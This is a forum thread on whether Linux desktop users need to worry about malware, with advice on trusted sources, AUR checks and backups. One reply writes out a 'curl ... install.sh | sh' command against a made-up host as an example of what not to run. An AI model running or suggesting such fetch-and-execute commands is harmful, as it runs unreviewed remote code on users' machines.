Do I have to worry about viruses and malware on Linux?

…I was hoping I could keep using linux without having to think about how I was using linux, let alone worry about viruses/malware…

If you use linux on the standard configuration and don’t install software from foreign sources and check the PKGBUIDs when using AUR, nothing could happen.

When someone say: “Run this!”

curl https://windows12-extra-spyware-protection.xy/install.sh | sh

Then don’t do this! check it before:

curl https://windows12-extra-spyware-protection.xy/install.sh | cat

Easy… and if don’t undertstand what it is doing. Ignore it.

These recommendations:

  • Maintain a list of trusted software sources, avoid using unencrypted update channels.
  • Do not run binaries and scripts from untrusted sources. A widely advertised way to install programs with commands like “curl https://install-url | sudo bash” is a security nightmare.
  • Make sure your update procedure is effective. Set up automatic security updates.
  • Spend time to set up your firewall properly: make sure it logs network activity, block all ports you don’t use, minimize your network footprint.
  • Use key-based SSH authentication, protect keys with passwords.
  • Use 2FA and store sensitive keys on external token devices (e.g. Yubikey).
  • Use an out-of-band network tap to independently monitor and analyze network communications of your Linux systems.
  • Maintain system executable file integrity. Review configuration file changes regularly.
  • Be prepared for insider/physical attacks: use full disk encryption, trusted/safe boot and put tamper-evident security tape on your critical hardware.
  • Audit the system, check logs for indicators of attacks.
  • Run penetration tests on your Linux setup.
  • Use a dedicated security solution for Linux with web and network protection, as well as features for DevOps protection.

…are actually not really for personal computers. Some of them are just overwhelmed. The default settings are good enough.

4 Likes

As long as you keep a healthy behavior with your system (do not install applications from unknown sources, furthermore with superuser privileges; do not open attachments from unexpected emails; etc.) you should be fine.

3 Likes

The article mentions Windows, Mac, IOS and even SMS.
If you want to be 100% do not use any.
As the posters above comment - do not be the low hanging fruit.

Interesting the summary from the page does not mention back ups. A must do, imo.

1 Like

Well, I clicked on the link you provide and saw ONE word : the authoring company name.
What’s its business ? --> Get paid as a function of risk of malwares & viruses.
Do you expect them to tell that there is moderate to no risk somewhere ?

2 Likes